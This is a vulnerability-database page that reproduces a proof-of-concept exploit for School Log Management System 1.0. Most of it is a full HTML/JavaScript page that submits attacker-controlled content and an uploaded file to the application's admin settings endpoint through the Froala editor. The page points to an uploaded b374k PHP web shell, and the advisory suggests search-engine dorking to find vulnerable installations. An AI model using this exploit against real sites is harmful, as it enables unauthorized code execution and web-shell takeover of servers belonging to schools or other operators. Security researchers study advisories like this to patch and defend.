Vulners
Lucene search
School Log Management System 1.0 SQL Injection / Code Execution
`=============================================================================================================================================
| # Title : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Part 01 : about-us.php
[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .
[+] Line 109 : Send the form data using fetch API (Set your target url)
[+] save payload as poc.html
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Settings Management</title>
<!-- Froala Editor CSS -->
<link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">
<!-- Bootstrap CSS -->
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
<style>
/* Custom Styles */
#cimg {
max-width: 100%;
height: auto;
}
#preloader2 {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0, 0, 0, 0.5);
display: flex;
justify-content: center;
align-items: center;
z-index: 9999;
}
.form-group {
margin-bottom: 1rem;
}
.form-group label {
display: block;
margin-bottom: .5rem;
}
.form-group input, .form-group textarea {
width: 100%;
padding: .5rem;
box-sizing: border-box;
}
</style>
</head>
<body>
<div class="container">
<form id="manage-settings" method="post" enctype="multipart/form-data">
<div class="form-group">
<label for="name"> Name</label>
<input type="text" id="name" name="name" required>
</div>
<div class="form-group">
<label for="email">Email</label>
<input type="email" id="email" name="email" required>
</div>
<div class="form-group">
<label for="contact">Contact</label>
<input type="tel" id="contact" name="contact" required>
<div class="form-group">
<label for="about">About Content</label>
<textarea class="text-jqte" id="about" name="about"></textarea>
</div>
<div class="form-group">
<label for="img">Cover Image</label>
<input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">
<img id="cimg" src="" alt="Selected Image Preview">
</div>
<button type="submit" class="btn btn-primary">Save Settings</button>
</form>
</div>
<div class="modal fade" id="viewer_modal" role='dialog'>
<div class="modal-dialog modal-md" role="document">
<div class="modal-content">
<button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>
<img src="" alt="">
</div>
</div>
</div>
<!-- jQuery -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<!-- Froala Editor JS -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>
<!-- Bootstrap JS (for modals) -->
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>
<script>
function displayImg(input, _this) {
if (input.files && input.files[0]) {
var reader = new FileReader();
reader.onload = function (e) {
$('#cimg').attr('src', e.target.result);
}
reader.readAsDataURL(input.files[0]);
}
}
$(document).ready(function () {
const editorInstance = new FroalaEditor('.text-jqte');
});
$('#manage-settings').submit(function (e) {
e.preventDefault();
start_load();
$.ajax({
url: 'http://127.0.0.1/slms/admin/ajax.php?action=save_settings',
data: new FormData($(this)[0]),
cache: false,
contentType: false,
processData: false,
method: 'POST',
type: 'POST',
error: err => {
console.log(err);
},
success: function (resp) {
if (resp == 1) {
alert_toast('Data successfully saved.', 'success');
setTimeout(function () {
location.reload();
}, 1000);
}
}
});
});
window.start_load = function () {
$('body').prepend('<div id="preloader2"></div>');
}
window.end_load = function () {
$('#preloader2').fadeOut('fast', function () {
$(this).remove();
});
}
window.viewer_modal = function ($src = '') {
start_load();
var t = $src.split('.');
t = t[1];
if (t == 'mp4') {
var view = $("<video src='" + $src + "' controls autoplay></video>");
} else {
var view = $("<img src='" + $src + "' />");
}
$('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();
$('#viewer_modal .modal-content').append(view);
$('#viewer_modal').modal({
show: true,
backdrop: 'static',
keyboard: false,
focus: true
});
end_load();
}
window.uni_modal = function ($title = '', $url = '', $size = "") {
start_load();
$.ajax({
url: $url,
error: err => {
console.log(err);
alert("An error occurred");
},
success: function (resp) {
if (resp) {
$('#uni_modal .modal-title').html($title);
$('#uni_modal .modal-body').html(resp);
if ($size != '') {
$('#uni_modal .modal-dialog').addClass($size);
} else {
$('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");
}
$('#uni_modal').modal({
show: true,
backdrop: 'static',
keyboard: false,
focus: true
});
end_load();
}
}
});
}
window._conf = function ($msg = '', $func = '', $params = []) {
$('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");
$('#confirm_modal .modal-body').html($msg);
$('#confirm_modal').modal('show');
}
window.alert_toast = function ($msg = 'TEST', $bg = 'success') {
$('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');
if ($bg == 'success')
$('#alert_toast').addClass('bg-success');
if ($bg == 'danger')
$('#alert_toast').addClass('bg-danger');
if ($bg == 'info')
$('#alert_toast').addClass('bg-info');
if ($bg == 'warning')
$('#alert_toast').addClass('bg-warning');
$('#alert_toast .toast-body').html($msg);
$('#alert_toast').toast({ delay: 3000 }).toast('show');
}
</script>
</body>
</html>
[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4